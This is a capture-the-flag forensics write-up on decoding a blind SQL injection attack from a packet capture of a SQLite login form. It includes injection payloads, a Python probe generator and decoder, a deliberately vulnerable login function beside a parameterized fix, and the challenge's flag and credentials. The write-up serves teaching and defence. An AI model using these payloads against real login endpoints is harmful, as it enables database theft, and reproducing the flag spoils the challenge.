Forensics
Medium
180 points

Leak

Recuite 2025 - HCMUS
October 6, 2025
PCAP
SQL Injection
Blind SQLi
Database Leak

Leak - Writeup

Challenge Information

  • Category: Forensics
  • Files: capture.pcap (6.5MB)
  • Hint: "Hacker leaked my website database. Recover what was leaked!"

Analysis

Attack Vector

HTTP POST requests to /login contain blind SQL injection payloads targeting a SQLite database.

userid=123" OR [SQL_INJECTION_PAYLOAD]-- &userpassword=123

Injection Technique

Character-by-character extraction using SUBSTR() and comparing the result against CHAR():

SUBSTR((SELECT CAST(userid AS TEXT) FROM users LIMIT 0,1), 1, 1) != CHAR(97)

The statement checks whether the first character of userid in the first row is NOT 'a' (CHAR(97)). Because the comparison is `!=`, each request tests a single candidate character: the condition is true for every wrong guess and false only for the right one, so the one request whose response shows the condition evaluating false reveals the character. (A true binary search would compare with < or > to halve the candidate range on every request; the probe shape shown above does not do that.) Once the position runs past the end of the value, SUBSTR() returns an empty string and every candidate yields true, which is how the end of a field shows up in the capture.

Extraction Process

The attacker sequentially extracts:

  1. Table schema from sqlite_master
  2. Row count of the users table
  3. Each character of userid and userpassword, one position at a time
  4. Successive rows via LIMIT offsets (LIMIT 0,1; LIMIT 1,1; LIMIT 2,1; ...)

Decoding Leaked Data

Python script used to analyze SQL injection queries in pcap:

import re
import subprocess
import urllib.parse

# Dump the capture as ASCII so the HTTP request bodies can be grepped line by line.
result = subprocess.run(['tcpdump', '-r', 'capture.pcap', '-A'],
                        capture_output=True, text=True)

# The injection sits in the userid field of each POST /login body.
pattern = r'userid=(.+?)&userpassword'
# One probe: SUBSTR((SELECT CAST(<col> AS TEXT) FROM users LIMIT <row>,1), <pos>, 1) != CHAR(<n>)
probe = re.compile(r'CAST\((\w+) AS TEXT\) FROM users LIMIT (\d+),1\),\s*(\d+),\s*1\)\s*!=\s*CHAR\((\d+)\)')
leaked_data = {}

def parse_successful_matches(payload):
    # Record which character was tried for each (column, row, position).
    m = probe.search(payload)
    if m:
        col, row, pos, code = m.group(1), int(m.group(2)), int(m.group(3)), int(m.group(4))
        leaked_data.setdefault((col, row), {}).setdefault(pos, []).append(chr(code))

for line in result.stdout.split('\n'):
    match = re.search(pattern, line)
    if match:
        # Form bodies encode spaces as '+', so use unquote_plus rather than unquote.
        payload = urllib.parse.unquote_plus(match.group(1))
        parse_successful_matches(payload)

(Note: parse_successful_matches() only records which candidate was tried at each (column, row, position). To reconstruct the actual characters, each probe must be paired with the server's response to that request: with the `!=` test, the candidate whose request made the condition false, i.e. produced the login-failed response, is the real character.)
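The full reconstruction, as an added example that is not part of the original writeup: it replays a probe stream of the shape shown above against a constructed two-row table (not the challenge's data) through a fake boolean oracle, then inverts the oracle from the resulting (request, response) pairs. `probe_payload`, `fake_server`, `attacker_stream` and `reconstruct` are this example's own names. It assumes the capture's login behaves as a boolean oracle where a true injected condition means "login succeeded"; the page's script reads only requests, whereas this one also needs each request's response, which in the real capture would be taken from the matching HTTP reply.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Shape of one probe from the capture: column, row offset, char position, CHAR code.
PROBE = re.compile(
    r"SUBSTR\(\(SELECT CAST\((\w+) AS TEXT\) FROM users LIMIT (\d+),1\),"
    r"\s*(\d+),\s*1\)\s*!=\s*CHAR\((\d+)\)"
)

# Constructed stand-in for the target table (NOT the challenge's data), used only
# to synthesise an attacker-like request/response stream offline.
FAKE_USERS = [("admin", "guest"), ("alice", "s3cret")]


def probe_payload(column, row, pos, code):
    """Build the userid form field for one blind probe, in the page's format."""
    cond = (f"SUBSTR((SELECT CAST({column} AS TEXT) FROM users LIMIT {row},1), "
            f"{pos}, 1) != CHAR({code})")
    return f'123" OR {cond}-- '


def fake_server(userid_field):
    """Boolean oracle (assumption): login 'succeeds' (True) exactly when the
    injected condition is true, as with `WHERE userid="..." AND ...` where the
    rest of the clause is commented out by the trailing `-- `."""
    m = PROBE.search(userid_field)
    column, row, pos, code = m.group(1), int(m.group(2)), int(m.group(3)), int(m.group(4))
    value = FAKE_USERS[row][0 if column == "userid" else 1]
    # SQLite's SUBSTR past the end of the string yields '', which is != any CHAR().
    ch = value[pos - 1] if pos <= len(value) else ""
    return ch != chr(code)


def attacker_stream(alphabet):
    """Emit (request_body, login_ok) pairs the way the captured attack would
    look: every candidate for a position is tried until one comes back false;
    a position where every candidate comes back true ends the field."""
    pairs = []
    for row in range(len(FAKE_USERS)):
        for column in ("userid", "userpassword"):
            pos = 1
            while True:
                found = False
                for ch in alphabet:
                    field = probe_payload(column, row, pos, ord(ch))
                    body = f"userid={quote_plus(field)}&userpassword=123"
                    ok = fake_server(field)
                    pairs.append((body, ok))
                    if not ok:
                        found = True
                        break
                if not found:
                    break
                pos += 1
    return pairs


def reconstruct(pairs):
    """Invert the oracle: for each (row, column, position) the real character is
    the candidate whose `!=` probe came back false (login failed)."""
    chars = {}
    for body, ok in pairs:
        m = re.search(r"userid=(.+?)&userpassword", body)
        if not m:
            continue
        field = unquote_plus(m.group(1))   # form encoding: '+' is a space
        p = PROBE.search(field)
        if not p or ok:
            continue   # a true `!=` only says what the character is NOT
        column, row, pos, code = p.group(1), int(p.group(2)), int(p.group(3)), int(p.group(4))
        chars.setdefault((row, column), {})[pos] = chr(code)
    table = {}
    for (row, column), positions in chars.items():
        table.setdefault(row, {})[column] = "".join(positions[i] for i in sorted(positions))
    return table


if __name__ == "__main__":
    stream = attacker_stream("abcdefghijklmnopqrstuvwxyz0123456789")
    print(len(stream), "probes")
    for row, cols in sorted(reconstruct(stream).items()):
        print(row, cols["userid"], cols["userpassword"])
```

Against the real capture, replace `attacker_stream()` with the decoded request bodies paired with the status or body of each HTTP response, and keep the same `reconstruct()`; the alphabet the attacker used is whatever set of CHAR() codes actually appears in the probes.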

Leaked Database

Row  User ID   Password
0    admin     guest
1    alice     BPCTF{w4it_wh4t!!1_1_h4v3_b33n_3xf1ltr4t3d_XD}
2    bob       alice123
3    charlie   bob123
4    guest     charlie123

Flag

BPCTF{w4it_wh4t!!1_1_h4v3_b33n_3xf1ltr4t3d_XD}

Key Takeaways

  1. Blind SQLi Detection: a long run of near-identical POSTs whose only variation is the probed row, position and CHAR() code is the signature of systematic character-by-character extraction.
  2. PCAP Analysis: the attack is hidden within normal-looking HTTP POSTs to /login.
  3. URL Decoding: payloads are URL encoded (with '+' for spaces), so decode them before analysis.
  4. Pattern Recognition: comparing SUBSTR() output against CHAR() codes identifies the probe for each (column, row, position).
  5. Data Reconstruction: pair each probe with the server's response; the candidate that made the condition false is the real character.

Mitigation

  • Use parameterized queries / prepared statements.
  • Apply rate limiting to login endpoints.
  • Configure WAF rules to block suspicious SQL patterns.
  • Monitor logs to detect unusual SQL patterns.
  • Apply principle of least privilege for database accounts.
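The first mitigation, shown side by side with the vulnerable form, as an added example that is not part of the original writeup. It builds a constructed two-row users table in an in-memory SQLite database (not the challenge's data) and runs the capture's first probe through a string-built login query and through a parameterized one. The demo query uses single-quoted string literals, SQLite's standard syntax, so the probe carries a single quote where the capture used a double quote; `login_vulnerable`, `login_safe` and `blind_probe` are this example's own names.

```python
import sqlite3

# Constructed users table (not the challenge's data).
SAMPLE_USERS = [("admin", "guest"), ("alice", "s3cret")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid TEXT, userpassword TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, userid, userpassword):
    """Deliberately vulnerable: input is spliced into the SQL text, so a quote in
    `userid` closes the literal and the rest of the field runs as SQL."""
    sql = (f"SELECT userid FROM users WHERE userid='{userid}' "
           f"AND userpassword='{userpassword}'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, userid, userpassword):
    """Parameterized: values are bound separately from the SQL text, so the same
    payload is just a (non-matching) username string."""
    sql = "SELECT userid FROM users WHERE userid=? AND userpassword=?"
    return conn.execute(sql, (userid, userpassword)).fetchone() is not None


def blind_probe(code):
    """The capture's first probe, with a single quote in place of the double quote
    because this demo's query uses single-quoted literals."""
    return ("123' OR SUBSTR((SELECT CAST(userid AS TEXT) FROM users LIMIT 0,1), 1, 1) "
            f"!= CHAR({code})-- ")


if __name__ == "__main__":
    conn = make_db()
    # Vulnerable endpoint is a boolean oracle: the truth of the injected
    # condition decides whether the login "succeeds".
    print("vulnerable, CHAR(97):", login_vulnerable(conn, blind_probe(97), "123"))  # 'a' != 'a'
    print("vulnerable, CHAR(98):", login_vulnerable(conn, blind_probe(98), "123"))  # 'a' != 'b'
    # Parameterized endpoint gives no oracle: both probes are unknown user IDs.
    print("safe, CHAR(97):", login_safe(conn, blind_probe(97), "123"))
    print("safe, CHAR(98):", login_safe(conn, blind_probe(98), "123"))
    print("safe, real creds:", login_safe(conn, "admin", "guest"))
```

The difference between the two vulnerable results is exactly the signal the attacker reads one character at a time; the parameterized version returns the same answer for every probe, which removes the oracle rather than trying to filter the payload.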